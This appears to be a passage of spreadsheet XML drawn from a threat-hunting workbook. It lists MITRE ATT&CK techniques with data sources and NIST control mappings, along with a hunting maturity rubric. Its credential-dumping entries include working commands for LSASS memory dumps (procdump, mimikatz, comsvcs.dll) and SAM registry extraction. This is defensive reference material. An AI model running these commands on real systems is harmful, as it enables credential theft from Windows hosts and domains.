    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>DNS Calculation</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>Drive: Drive Access, Drive: Drive Creation</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>Environmental Keying</t>
  </si>
  <si>
    <t>T1027.006</t>
  </si>
  <si>
    <t>HTML Smuggling</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1564.009</t>
  </si>
  <si>
    <t>Resource Forking</t>
  </si>
  <si>
    <t>CM-11,CM-2,CM-6,CM-7,SA-10,SC-4,SC-44,SC-6,SI-10,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>Internet Connection Discovery</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>Remote Data Staging</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>Malicious Image</t>
  </si>
  <si>
    <t>AC-4,CA-7,CA-8,CM-2,CM-6,CM-7,RA-5,SC-44,SC-7,SI-2,SI-3,SI-4,SI-7,SI-8,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>T1213.003</t>
  </si>
  <si>
    <t>Code Repositories</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,IA-2,IA-9,RA-5,SA-10,SA-11,SA-15,SA-3,SA-8,SI-2</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, WMI: WMI Creation</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>Revert Cloud Instance</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>Container Administration Command</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-6,CM-7,SC-7,SI-10,SI-7</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>Deploy Container</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-6,CM-7,IA-2,SC-7,SI-4</t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>Escape to Host</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,SC-18,SC-2,SC-3,SC-34,SC-39,SC-7,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t xml:space="preserve">T1612 </t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CA-8,CM-6,CM-7,RA-5,SA-11,SC-7,SI-4</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Disocovery</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-6,CM-7,IA-2,SC-43,SC-7,SI-4</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t>T1614.001</t>
  </si>
  <si>
    <t>System Language Discovery</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>T1619</t>
  </si>
  <si>
    <t>Cloud Storage Object Discovery</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-5,IA-2</t>
  </si>
  <si>
    <t>T1620</t>
  </si>
  <si>
    <t>Reflective Code Loading</t>
  </si>
  <si>
    <t>T1588.003</t>
  </si>
  <si>
    <t>Code Signing Certificates</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Scan Databases</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>T1588.004</t>
  </si>
  <si>
    <t>Digital Certificates</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t>Exploits</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>Employee Names</t>
  </si>
  <si>
    <t>T1592.004</t>
  </si>
  <si>
    <t>Client Configurations</t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>Disable Crypto Hardware</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Persona: Social Media</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>Web Services</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>Upload Malware</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>Determine Physical Locations</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>CDNs</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>Threat Intel Vendors</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>Purchase Technical Data</t>
  </si>
  <si>
    <t>T1608</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>Upload Tool</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access, Cloud Storage: Cloud Storage Enumeration</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>T1583.003</t>
  </si>
  <si>
    <t>Virtual Private Server</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>Business Relationships</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>Identify Business Tempo</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>Identify Roles</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>WHOIS</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Domains</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Server</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>Internet Scan: Response Content, Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>T1584.006</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration, Internet Scan: Response Content, Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>T1585.002</t>
  </si>
  <si>
    <t>Email Accounts</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration, Internet Scan: Response Content</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>T1587.003</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>Firmware</t>
  </si>
  <si>
    <t>T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>Social Media</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>Search Engines</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>Reduce Key Space</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>Install Digital Certificate</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Script: Script Execution</t>
  </si>
  <si>
    <t>T1608.004</t>
  </si>
  <si>
    <t>Drive-by Target</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>Link Target</t>
  </si>
  <si>
    <t> </t>
  </si>
  <si>
    <t>Technology</t>
  </si>
  <si>
    <t>Data Quality</t>
  </si>
  <si>
    <t>Definition</t>
  </si>
  <si>
    <t xml:space="preserve">Hunt Tool </t>
  </si>
  <si>
    <t>Completeness</t>
  </si>
  <si>
    <t>Timeliness</t>
  </si>
  <si>
    <t>Consistency</t>
  </si>
  <si>
    <t>Ease of Use [Missing Data and Data Retention]</t>
  </si>
  <si>
    <t>Response Time [Active vs Passive (are you catching the adversary real time or is it after the fact)]</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>I don’t know what tools I have or need in order to start hunting. No documentation available. There is not even a SIEM to process the data.</t>
  </si>
  <si>
    <t>don’t know / not documented</t>
  </si>
  <si>
    <t xml:space="preserve">not documented/don't know </t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>The right technology is present to help centralize your data across several other tools (Splunk, ELK, EDR, etc).
Tools allowing you to run basic queries in order to make sense of the data without automation,reducing the efficiency and effectiveness of your hunt(i.e Running a few queries returns still thousands and thousands of events that your team will still need to go through manually).</t>
  </si>
  <si>
    <t>Endpoint Coverage - required data source is available from  0 - 25% of your network endpoints.
Missing Data - Required data (values or fields) is missing 75%-100%.
Data Retention - Required data is retained 0-25% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Original timezone identified in data (Local or UTC)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Ingestion time only automatically generated</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 0-25% across all data sources.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 0-25% across all data sources.</t>
    </r>
  </si>
  <si>
    <t>Missing Data - Required data (values or fields) is missing 75%-100%.
Data Retention - Required data is retained 0-25% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <t>Passive 0-25 | Active 0-25%</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>Having the right tools/processes to aggregate and make sense of all the data. Possible to not have an effective team to automate rules/queries. Tools helping you correlate and integrate numerous data types across all your endpoints in order to filter out noise and potential false positives. Here is where you start using a few basic Data Science capabilities provided by your tools (i.e ELK Enterprise) in order to make sense of all the data that you have in your central repository (Potential Automation).</t>
  </si>
  <si>
    <t>Endpoint Coverage - required data source is available from  50% - 75% of your network endpoints.
Missing Data - Required data (values or fields) is missing 25%-50%.
Data Retention - Required data is retained 50%-75% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Extra timezones identified in order to cover at least local and UTC times (not fixed yed).</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Ingestion time only automatically generated.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 25%-50% across all data sources.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 25%-50% across all data sources.</t>
    </r>
  </si>
  <si>
    <t>Missing Data - Required data (values or fields) is missing 25%-75%.
Data Retention - Required data is retained 25%-75% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <t>Passive 50-75% | Active 50-75%</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Having tools to leverage over simple outlier detection techniques. Can you validate the detection of an adversary technique by just applying basic data science techniques? Can you integrate the appropriate tools with other platforms (processes) with other teams across your security department (IR Ticketing system, Intel Platforms (not just to ingest IOCs, but to document hunting campaign results that might turn into actionable intelligence), etc). This is more specific to your organization and flexibility of your hunting tools play a big role here (i.e API access)</t>
  </si>
  <si>
    <t>Endpoint Coverage - required data source is available from  75%-100% of your network endpoints
Missing Data - Required data (values or fields) is missing 0%-25%
Data Retention - Required data is retained 75%-100% of the time needed or defined by the organization</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Extra timezones configured in order to cover at least local and UTC times
Ingestion vs Creation - Ingestion time automatically generated and Creation time capability identified</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 50%-75% across all data sources</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 50%-75% across all data sources</t>
    </r>
  </si>
  <si>
    <t>Missing Data - Required data (values or fields) is missing 0-25%
Data Retention - Required data is retained 75%-100% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <t>Passive 75-100% | Active 75-100%</t>
  </si>
  <si>
    <r>
      <t>Timezones</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Extra timezones configured in order to cover at least local and UTC times
 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Ingestion  and Creation time configured to be available as two different fields and used to reduce latency.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 50%-75% across all data sources</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 75%-100% across all data sources</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Timezones </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">- Extra timezones configured in order to cover at least local and UTC times
 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ingestion and creation time difference has been reduced to the minimun.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 75%-100% across all data sources</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 75%-100% across all data sources</t>
    </r>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>created</t>
  </si>
  <si>
    <t>last modified</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>tactics</t>
  </si>
  <si>
    <t>detection</t>
  </si>
  <si>
    <t>platforms</t>
  </si>
  <si>
    <t>is sub-technique</t>
  </si>
  <si>
    <t>sub-technique of</t>
  </si>
  <si>
    <t>contributors</t>
  </si>
  <si>
    <t>system requirements</t>
  </si>
  <si>
    <t>permissions required</t>
  </si>
  <si>
    <t>effective permissions</t>
  </si>
  <si>
    <t>defenses bypassed</t>
  </si>
  <si>
    <t>impact type</t>
  </si>
  <si>
    <t>supports remote</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obfuscate command and control traffic to make it more difficult to detect.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 </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001</t>
  </si>
  <si>
    <t>31 May 2017</t>
  </si>
  <si>
    <t>15 March 2020</t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>Command And Control</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</si>
  <si>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</si>
  <si>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Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Data Obfuscation: Junk Data</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/001</t>
  </si>
  <si>
    <t>1.0</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</si>
  <si>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</si>
  <si>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Data Obfuscation: Steganography</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1001/002</t>
  </si>
  <si>
    <t>Data Obfuscation: Protocol Impersonation</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  
Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>15 October 2021</t>
  </si>
  <si>
    <t>2.1</t>
  </si>
  <si>
    <t>Credential Access</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</si>
  <si>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</si>
  <si>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Ed Williams, Trustwave, SpiderLabs; Vincent Le Toux</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory</t>
  </si>
  <si>
    <t xml:space="preserve">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Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run using:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
Built-in Windows tools such as comsvcs.dll can also be used:
* &lt;code&gt;rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full&lt;/code&gt;(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS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
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>11 February 2020</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</si>
  <si>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</si>
  <si>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Windows</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs; Edward Millington</t>
  </si>
  <si>
    <t>OS Credential Dumping: Security Account Manager</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;net user&lt;/code&gt; command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes: 
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>25 March 2020</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</si>
  <si>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</si>
  <si>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Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>OS Credential Dumping: NTDS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in &lt;code&gt;%SystemRoot%\NTDS\Ntds.dit&lt;/code&gt; of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/003</t>
  </si>
  <si>
    <t>14 December 2020</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t>Access to Domain Controller or backup</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSA Secrets</t>
  </si>
  <si>
    <t>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>21 February 2020</t>
  </si>
  <si>
    <t>21 April 2021</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</si>
  <si>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</si>
  <si>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OS Credential Dumping: Cached Domain Credentials</t>
  </si>
  <si>
    <t>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/005</t>
  </si>
  <si>
    <t>24 March 2020</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</si>
  <si>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</si>
  <si>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OS Credential Dumping: DCSync</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/006</t>
  </si>
  <si>
    <t>22 April 2021</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</si>
  <si>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</si>
  <si>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ExtraHop; Vincent Le Toux</t>
  </si>
  <si>
    <t>OS Credential Dumping: Proc Filesystem</t>
  </si>
  <si>
